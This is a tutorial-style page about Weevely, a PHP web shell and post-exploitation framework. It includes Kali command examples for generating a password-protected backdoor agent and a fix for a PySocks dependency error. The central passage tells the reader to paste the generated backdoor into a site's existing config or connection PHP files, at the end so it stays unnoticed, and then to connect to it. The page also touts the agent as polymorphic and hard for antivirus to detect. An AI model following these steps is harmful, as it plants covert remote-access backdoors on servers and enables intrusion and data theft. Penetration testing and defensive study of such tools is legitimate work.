Weevely is a command line web shell dynamically extended over the network at runtime, designed for remote server administration and penetration testing.
Its terminal executes arbitrary remote code through the small footprint PHP agent that sits on the HTTP server. Over 30 modules shape an adaptable web administration and post-exploitation backdoor for access maintenance, privilege escalation and network lateral movement, even in restricted environment.
Read the Wiki for tutorials and uses cases.
The framework features:
- Ssh-like terminal
- SQL console pivoted on target
- HTTP proxy pivoted on target
- Host configuration security auditing
- Mount of the remote filesystem
- Network scan pivoted on target
- File upload and download
- Reverse and direct TCP shell
- Meterpreter support
- Service account bruteforce
- Compressed archive management
The backdoor agent
The remote agent is a small PHP script which can extend its functionality over the network at run-time. The agent code is polymorphic and hardly detectable by AV and the traffic is obfuscated within the HTTP requests.
root@kali:~# weevely [+] weevely 3.2.0 [!] Error: too few arguments [+] Run terminal to the target weevely <URL> <password> [cmd] [+] Load session file weevely session <path> [cmd] [+] Generate backdoor agent weevely generate <password> <path> root@kali:~#
weevely Usage Example
Generate a PHP backdoor (weevely.php) protected with the given password (pass).
root@kali:~# weevely generate pass /root/Desktop/weevely.php Generated backdoor with password 'pass' in '/root/Desktop/weevely.php' of 1466 byte size.
Now generated backdoor is available on our provided path
/root/Desktop/weevely.php. Open it with some text editor and copy all code of this weevely.php. Now go back to your owned server and open some file that you want to backdoor. For example, i want to backdoor config.php, config.inc.php, connection.php etc. Now open each file and paste this code at the end or start of that PHP file.(I would recommend pasting at the end of file, because it will make your injected backdoor a little bit anonymous).Now server is backdoored. Lets test it with our weevely tool. Open termial or cmd and connect to those backdoored files using following weevely command.
root@kali:~# weevely http://127.0.0.1/shells/weevely.php pass
Fix Weevely dependencies in Kali Linux
If you ever run in to this error when trying to connect to a php web shell with weevely, here’s the simple fix.
root@kali:~/Desktop/Sidney# weevely http://127.0.0.1/shells/weevely.php pass Traceback (most recent call last): File "./weevely.py", line 98, in <module> main(arguments) File "./weevely.py", line 48, in main modules.load_modules(session) File "/usr/share/weevely/core/modules.py", line 24, in load_modules (module_group, module_name), fromlist=["*"] File "/usr/share/weevely/modules/shell/php.py", line 4, in <module> from core.channels.channel import Channel File "/usr/share/weevely/core/channels/channel.py", line 8, in <module> import sockshandler ImportError: No module named sockshandler
According to the error, python can’t import sockshandler, OH NO! Steps to recovery: Download the latest build of PySocks HERE.Unzip, build and install.
root@kali:~/Downloads# tar -xf PySocks-1.6.6.tar.gz root@kali:~/Downloads# chmod +x PySocks-1.6.6/setup.py root@kali:~/Downloads# cd PySocks-1.6.6/ root@kali:~/Downloads/PySocks-1.6.6# ./setup.py build running build running build_py creating build creating build/lib.linux-x86_64-2.7 copying socks.py -> build/lib.linux-x86_64-2.7 copying sockshandler.py -> build/lib.linux-x86_64-2.7 root@kali:~/Downloads/PySocks-1.6.6# ./setup.py install running install running build running build_py running install_lib copying build/lib.linux-x86_64-2.7/sockshandler.py -> /usr/local/lib/python2.7/dist-packages copying build/lib.linux-x86_64-2.7/socks.py -> /usr/local/lib/python2.7/dist-packages byte-compiling /usr/local/lib/python2.7/dist-packages/sockshandler.py to sockshandler.pyc byte-compiling /usr/local/lib/python2.7/dist-packages/socks.py to socks.pyc running install_egg_info Writing /usr/local/lib/python2.7/dist-packages/PySocks-1.6.6.egg-info
Now try weevely again:
root@kali:~/Desktop/Sidney# weevely http://127.0.0.1/shells/weevely.php pass [+] weevely 3.2.0 [+] Target: 192.168.1.10 [+] Session: /root/.weevely/sessions/127.0.0.1/weevely_1.session [+] Browse the filesystem or execute commands starts the connection [+] to the target. Type :help for more information.
Weevely also provides python API to develop your own module to implement internal audit, account enumerator, sensitive data scraper, network scanner, make the modules work as a HTTP or SQL client and do a whole lot of other cool stuff.